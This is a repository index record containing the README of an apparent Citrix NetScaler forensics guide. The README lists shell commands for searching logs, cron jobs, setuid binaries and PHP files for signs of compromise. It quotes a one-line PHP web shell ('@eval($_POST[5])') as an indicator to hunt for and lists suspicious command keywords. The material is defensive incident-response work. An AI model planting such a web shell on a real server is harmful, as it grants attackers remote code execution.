{"id":26731841,"url":"https://github.com/b0lg0r0v/citrix-netscaler-forensics","last_synced_at":"2025-03-28T00:38:54.603Z","repository":{"id":219251144,"uuid":"748568252","full_name":"B0lg0r0v/citrix-netscaler-forensics","owner":"B0lg0r0v","description":"This repository contains a list of artifacts to search for while performing a forensic investigation on Citrix Netscaler appliances.","archived":false,"fork":false,"pushed_at":"2024-01-30T12:49:30.000Z","size":43,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-01-31T10:25:10.195Z","etag":null,"topics":["citrix-adc","citrix-adc-forensics","citrix-netscaler","forensic-analysis","guide","malware"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/B0lg0r0v.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2024-01-26T09:18:39.000Z","updated_at":"2024-01-30T12:52:56.000Z","dependencies_parsed_at":"2024-01-29T10:24:48.632Z","dependency_job_id":"818fd02e-57f9-468a-b7a7-1ce62c0e494b","html_url":"https://github.com/B0lg0r0v/citrix-netscaler-forensics","commit_stats":null,"previous_names":["b0lg0r0v/citrix-adc-forensics","b0lg0r0v/citrix-netscaler-forensics"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B0lg0r0v%2Fcitrix-netscaler-forensics","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B0lg0r0v%2Fcitrix-netscaler-forensics/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposito
ries/B0lg0r0v%2Fcitrix-netscaler-forensics/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/B0lg0r0v%2Fcitrix-netscaler-forensics/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/B0lg0r0v","download_url":"https://codeload.github.com/B0lg0r0v/citrix-netscaler-forensics/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245949553,"owners_count":20698916,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["citrix-adc","citrix-adc-forensics","citrix-netscaler","forensic-analysis","guide","malware"],"created_at":"2025-03-28T00:38:53.572Z","updated_at":"2025-03-28T00:38:54.586Z","avatar_url":"https://github.com/B0lg0r0v.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Citrix Netscaler Forensics\nThis repository provides a comprehensive list of commands \u0026 artifacts to search for while performing a forensic investigation on Citrix Netscaler appliances. Contributions are welcome.\u003cbr\u003e\n\n# Table Of Contents\n- [Automated Script](#automated-script)\n- [Manual Forensics](#manual-forensics)\n- [Launch the THOR APT Scanner](#launch-the-thor-apt-scanner)\n- [References](#references)\n\n# Automated Script\nI've made a small shell script which acts as a wrapper around these commands. 
You can, if you want to automate the process (although I still recommend double-checking manually), run the script directly on the ADC appliance.\n\n```\ncurl -o citrix-adc-forensics.sh https://raw.githubusercontent.com/B0lg0r0v/citrix-netscaler-forensics/main/citrix-adc-forensics.sh\nchmod +x citrix-adc-forensics.sh\n./citrix-adc-forensics.sh\n```\n\nThis will generate a `forensics` folder in your current working directory.\n\n# Manual Forensics\n\nLog files are generally located under:\n```\n/var/log/*\n```\n\nFailed authentication attempts\n```\nzcat /var/log/ns.log.*.gz | grep \"Authentication is rejected\" | awk '{$1=$2=$3=$4=$5=$6=$7=$8=\"\"; print $0}' | sort | uniq -c | sort -nr\n```\n\nSSH logs\n```\nzcat /var/log/auth.log.*.gz | grep -i \"sshd\" | grep -i \"accepted password\" | awk '{$1=$2=$3=$4=$5=$6=$7=$8=\"\"; sub(/^[[:space:]]+/, \"\"); print \"Accepted password for \" $0}' | sort | uniq -c | sort -nr\n```\n\nSearch for suspicious commands such as:\n```\ncurl\nhostname\nuname\nnobody\nwhoami\nid\n```\n\nSearch for suspicious activity in the HTTP logs\n```\n/var/log/httpaccess.log\n/var/log/httperror.log\n```\n\nLook for suspicious files in these directories. Payloads are often placed here.\n```\n/netscaler/portal/templates\n/var/tmp/netscaler/portal/templates\n```\n\nLook for processes and child processes\n```\nps aux\nps aux | grep nobody\n```\n\nLook for cron jobs and the cron history\n```\ncrontab -l -u nobody\ncrontab -l -u nsroot\ncrontab -l -u root\n\n/var/log/cron\n```\n\nLook for unauthorized modifications to the crontab file and/or suspicious files in /var/cron/tabs and other locations\n```\nfind / -type f -name \"res*\" | grep -E 'res($|\\.[a-z]{3})$'\n```\n\nCheck file integrity with MD5 sums and compare them against a known-good ADC.\n```\ncd /netscaler ; for i in nsppe nsaaad nsconf nsreadfile nsconmsg; do md5 ${i} ; done\n```\n\nCheck for APT5 techniques. This should produce no output. 
If it does, the appliance may be compromised.\n```\nprocstat -v $(pgrep -o -i nsppe) | grep \"0x10400000 \" | grep \"rwx\"\n```\n\nCheck for unusual administrator activity by looking for `pb_policy` entries in the `ns.log` file.\n```\nExample:\n\n\u003clocal0.info\u003e [hostname] pb_policy: Changing pitboss policy from X to Y\n\u003clocal0.info\u003e [hostname] pb_policy: Changing pitboss policy from Y to X\n\nX \u0026 Y are constant values for your system\n```\n\nCheck for potential PHP web shells\n```\n/var/netscaler/logon/LogonPoint/uiareas/[FILE].php\n\n\nContent could look like this:\n\u003c?php http_response_code(201); @eval($_POST[5]);\n\nLook in the httpaccess.log file for POST requests to the /logon/LogonPoint URL\n\nCommand 1\n\nfgrep -a -e http_response_code -e '$_POST' -r /var/netscaler/ | fgrep -v -e '/var/netscaler/gui/admin_ui' -e '/netscaler/websocketd' -e '/netscaler/ns_gui/admin_ui'\n\nCommand 2\n\nfgrep -a -e http_response_code -e '$_POST' -r /var/vpn/ | fgrep -v -e '/var/netscaler/gui/admin_ui' -e '/netscaler/websocketd' -e '/netscaler/ns_gui/admin_ui'\n\nCommand 3\n\nfgrep -a -e http_response_code -e '$_POST' -r /netscaler/ | fgrep -v -e '/var/netscaler/gui/admin_ui' -e '/netscaler/websocketd' -e '/netscaler/ns_gui/admin_ui'\n```\n\nCheck for PHP files, excluding folders that contain PHP files by default\n```\nfind / -type f -name '*.php*' -not -path \"/var/netscaler/gui/admin_ui/*\" -not -path \"/netscaler/websocketd/*\" -not -path \"/netscaler/ns_gui/admin_ui/*\"\n```\n\nSearch for *setuid* binaries. 
Planting a setuid binary is a privilege escalation technique.\n```\nfind / -perm -4000 -user root -exec ls -lc {} \\;\n\nFiles that normally have the setuid bit set:\n\n-r-sr-xr-x 1 root wheel 27872 Jul 10 18:24 /netscaler/ping\n-r-sr-xr-x 1 root wheel 32656 Jul 10 18:24 /netscaler/ping6\n-r-sr-xr-x 1 root wheel 31844 Jul 10 18:24 /netscaler/traceroute\n-r-sr-xr-x 1 root wheel 24784 Jul 10 18:24 /netscaler/traceroute6\n-r-sr-xr-- 1 root operator 10584 Jul 10 18:09 /sbin/mksnap_ffs\n-r-sr-xr-- 2 root operator 15936 Jul 10 18:09 /sbin/shutdown\n-r-sr-xr-- 2 root operator 15936 Jul 10 18:09 /sbin/poweroff\n-r-sr-xr-x 1 root wheel 34352 Jul 10 18:09 /usr/bin/crontab\n-r-sr-xr-x 1 root wheel 11632 Jul 10 18:09 /usr/bin/lock\n-r-sr-xr-x 1 root wheel 24552 Jul 10 18:09 /usr/bin/login\n-r-sr-xr-x 1 root wheel 9736 Jul 10 18:09 /usr/bin/passwd\n-r-sr-xr-x 1 root wheel 16408 Jul 10 18:09 /usr/bin/su\n-r-sr-xr-x 1 root wheel 74008 Jul 10 18:09 /usr/libexec/ssh-keysign\n```\n\n# Launch the THOR APT Scanner\n[@Neo23x0](https://github.com/Neo23x0) a.k.a. Florian Roth wrote a good guide on how to use the free version of the THOR APT Scanner to scan Citrix ADC.\u003cbr\u003e\u003cbr\u003e\nFollow the link: https://www.nextron-systems.com/2020/01/14/automated-citrix-netscaler-forensic-analysis-with-thor/\n\n\n# References\n2024-01-26, https://trustedsec.com/blog/netscaler-remote-code-execution-forensics\u003cbr\u003e\n2024-01-26, https://www.mandiant.com/resources/blog/session-hijacking-citrix-cve-2023-4966\u003cbr\u003e\n2024-01-26, https://support.citrix.com/article/CTX227560/citrix-adc-logs-collection-guide\u003cbr\u003e\n2024-01-26, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a\u003cbr\u003e\n2024-01-26, https://www.nextron-systems.com/2020/01/14/automated-citrix-netscaler-forensic-analysis-with-thor/\u003cbr\u003e\n2024-01-26, 
https://media.defense.gov/2022/Dec/13/2003131586/-1/-1/0/CSA-APT5-CITRIXADC-V1.PDF\u003cbr\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb0lg0r0v%2Fcitrix-netscaler-forensics","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fb0lg0r0v%2Fcitrix-netscaler-forensics","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fb0lg0r0v%2Fcitrix-netscaler-forensics/lists"}